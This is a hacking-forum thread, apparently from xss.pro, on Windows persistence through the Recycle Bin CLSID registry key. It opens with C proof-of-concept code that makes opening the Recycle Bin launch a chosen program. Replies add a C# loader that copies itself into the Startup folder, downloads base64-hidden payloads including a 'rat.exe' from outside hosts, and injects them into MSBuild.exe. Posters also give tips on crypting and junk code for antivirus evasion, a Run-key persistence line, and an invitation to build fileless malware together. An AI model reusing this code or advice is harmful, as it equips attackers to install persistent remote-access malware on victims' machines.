Статья Persistence via Recycle Bin

[qGodless]

Discovered by ethereal__vx

This entry in this series derives from a proof-of-concept illustrated by Hexacorn, initially published May 28th, 2018 (Beyond good ol’ Run Key, Part 78)

Introduction:
The Class ID, or CLSID, is a globally unique identifier that identifies a Windows COM class object. It allows operating systems and software to detect and access COM objects without identifying them by name. A typical CLSID in the registry looks like {645FF040-5081-101B-9F08-00AA002F954E} . Entries for the CLSID are present in HKEY_CLASSES_ROOT(HKCR). Values in HKCR is a merged view from both HKCU (HKEY_CURRENT_USER) and HKLM (HKEY_LOCAL_MACHINE). Because of this the majority of HKCR is read-only. However some keys allow a non-elevated user to both read and write. The registry hive contains keys and subkeys that can be used to change HKCR settings for file extensions to introduce a malicious proxy executable that can launch the appropriate file. Fortunately the use of CLSID’s and it’s functionality is well documented by Microsoft. This can give a better insight into what they’re , how they operate and various vulnerabilities which may be present by hijacking them and being used by malware authors. We would be focusing on the “Shell” subkey in regard to CLSID associated with Recycle Bin.

Don't understand?

Our approach to this persistence method would be simple. We would open a handle to registry key “HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shell” and create a subkey “open\command”.
When we create the subkey the path the target registry path would look as follows:

Now we’ll modify the command and set it’s value to point to “Calc.exe or cmd.exe” or our malicious application. 'notapad.exe' in my case

The result of this code will be when the user opens the Recycle Bin, it’ll execute the malicious application

Спойлер: POC Code

#include <Windows.h>
#include <stdio.h>

#define WCHAR_MAXPATH (MAX_PATH * sizeof(WCHAR))

DWORD P0x4(VOID);

int main(VOID)
{
    DWORD dwReturn = ERROR_SUCCESS;
    dwReturn = P0x4();

    if (dwReturn != ERROR_SUCCESS)
    {
        return dwReturn;
    }

    return ERROR_SUCCESS;
}

DWORD P0x4(VOID)
{
    HKEY  hKey = HKEY_CLASSES_ROOT;
    WCHAR lpSubKey[WCHAR_MAXPATH] = L"CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\shell\\open\\command";
    WCHAR lpData[WCHAR_MAXPATH] = L"CALC.EXE";
    HKEY  phkResult = NULL;
    HKEY  hkResult;
    DWORD dispositions;

    if (RegCreateKeyEx(hKey, lpSubKey, 0, NULL,
        REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hkResult, &dispositions) != ERROR_SUCCESS)
    {
        goto EXIT_ROUTINE;
    }

    if (RegOpenKeyEx(hKey, lpSubKey, 0, KEY_ALL_ACCESS, &phkResult) != ERROR_SUCCESS)
    {
        goto EXIT_ROUTINE;
    }

    if (RegSetValueEx(phkResult, NULL, 0, REG_SZ, (PBYTE)lpData, sizeof(lpData)) != ERROR_SUCCESS)
    {
        goto EXIT_ROUTINE;
    }

    if (phkResult)
    {
        RegCloseKey(phkResult);
    }

    if (hkResult)
    {
        RegCloseKey(hkResult);
    }
       
    return ERROR_SUCCESS;

EXIT_ROUTINE:

    DWORD dwError = GetLastError();

    if (phkResult)
    {
        RegCloseKey(phkResult);
    }

    if (hkResult)
    {
        RegCloseKey(hkResult);
    }

    return dwError;
}

 

[qGodless]

.

 

[DildoFagins]

HKCR is a virtual key, that combines COM settings from HKLM\Software\Classes and HKCU\Software\Classes. You need admin right to write to HKLM or HKCR, however this thing might work if you write this to HKCU, which should be possible without admin rights.

 

[mectury]

using System;
using System.Collections.Generic;
using System.Drawing;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.IO;
using System.Net;
using System.Reflection;
using System.Text;


namespace Mectury
{

    // Token: 0x02000002 RID: 2
    internal static class Program
    {
        // Token: 0x06000001 RID: 1 RVA: 0x00002050 File Offset: 0x00000250
        [STAThread]
        private static void Main()
        {
            {
                string friendlyName = AppDomain.CurrentDomain.FriendlyName;
                string destFileName = Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + friendlyName;
                try
                {
                    if (!File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Startup) + "\\" + friendlyName))
                    {
                        File.Copy(Application.ExecutablePath, destFileName);
                    }
                }
                catch (Exception)

                {
                }
                WebClient webClient = new WebClient();
                ServicePointManager.SecurityProtocol = SecurityProtocolType.Tls12;
                ServicePointManager.Expect100Continue = true;
                string donusturme = Encoding.UTF8.GetString
                    (Convert.FromBase64String("aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTgzNjY5NzU3MzQzNTY3ODcyLzk4NjU1MjIwNjM2OTExNjE5MC9xQ1FBR1FyeXJaa3NzUU1MQ1B5QXdranR2cWJUbmJ1bmRyTmtnZkNtUmVVbXJITUd4TWN5VGN5UmRHdlVyVlFzQU5hRFV4V2h0ekxnTFpZYWZEVFRLZnpQTENBdFhhR1NDbnV5VkxBeUFtYWZtVGZMa2RxclNCcUJ3QVhza1Aud2VicA=="));
                byte[] rawAssembly = webClient.DownloadData(donusturme);
                int[] array = new int[5];
                int[] array2 = new int[]
                {1,2,3,4,5}; int[] array3 = new int[] { 1, 2, 3, 4, 5 }; int[] array4 = new int[] { 1, 2, 3, 4, 5 }; int[] array5 = new int[] { 1, 2, 3, 4, 5 };
                WebClient webClient2 = new WebClient();
                string @yolhgs = Encoding.UTF8.GetString(Convert.FromBase64String("google.com/rat.exe"));
                Uri yolyordam = new Uri(@yolhgs);
                byte[] gelis = webClient2.DownloadData(yolyordam);
                object gidis = new object[]
                {
                "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\MSBuild.exe",
                string.Empty,
                gelis,
                true

                };
                string hedef = null;
                Assembly assembly = Assembly.Load(rawAssembly);
                assembly.GetType("ChromeUpdate2022.dJfaqrEmVM").InvokeMember("vkPHjQgjHx", BindingFlags.InvokeMethod, null, hedef, (object[])gidis);
            }
        }

    }
}

an old method I use, runPE is a dll, you can use armdot encryptor and encrypt it and inject the exe from within the project, for example, you can meet your daily weekly fud needs by using junkcodes with this method like RegAsm.

 

[mectury]

+++

You can also use your runPE project by changing it to .webp extension. There is no lifetime fud, but why not a lifetime fud using the same methodology?

 

[qGodless]

HKCR is a virtual key, that combines COM settings from HKLM\Software\Classes and HKCU\Software\Classes. You need admin right to write to HKLM or HKCR, however this thing might work if you write this to HKCU, which should be possible without admin rights.

Yeah anything inside "HKCR" is impossible to modify without admin rights. Thought inside "HKCR\CLSID" with or without admin rights you can't modify. The only thing I found is recycle bin

 

[mectury]

// .NET 3.5

Write(Microsoft.Win32.Registry.LocalMachine, @"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "WordWatcher", "\"" + Application.ExecutablePath.ToString() + "\"");


// or delete startup 
key.DeleteValue("your_app_name",false);

 

[qGodless]

// .NET 3.5

Write(Microsoft.Win32.Registry.LocalMachine, @"SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "WordWatcher", "\"" + Application.ExecutablePath.ToString() + "\"");


// or delete startup
key.DeleteValue("your_app_name",false);

That will need a malware, My goal for now is to make a fileless malware. Wanna help me out?)

 

[mectury]

That will need a malware, My goal for now is to make a fileless malware. Wanna help me out?)

of course sir i will do my best to glorify the xss.pro forum when i am available. <3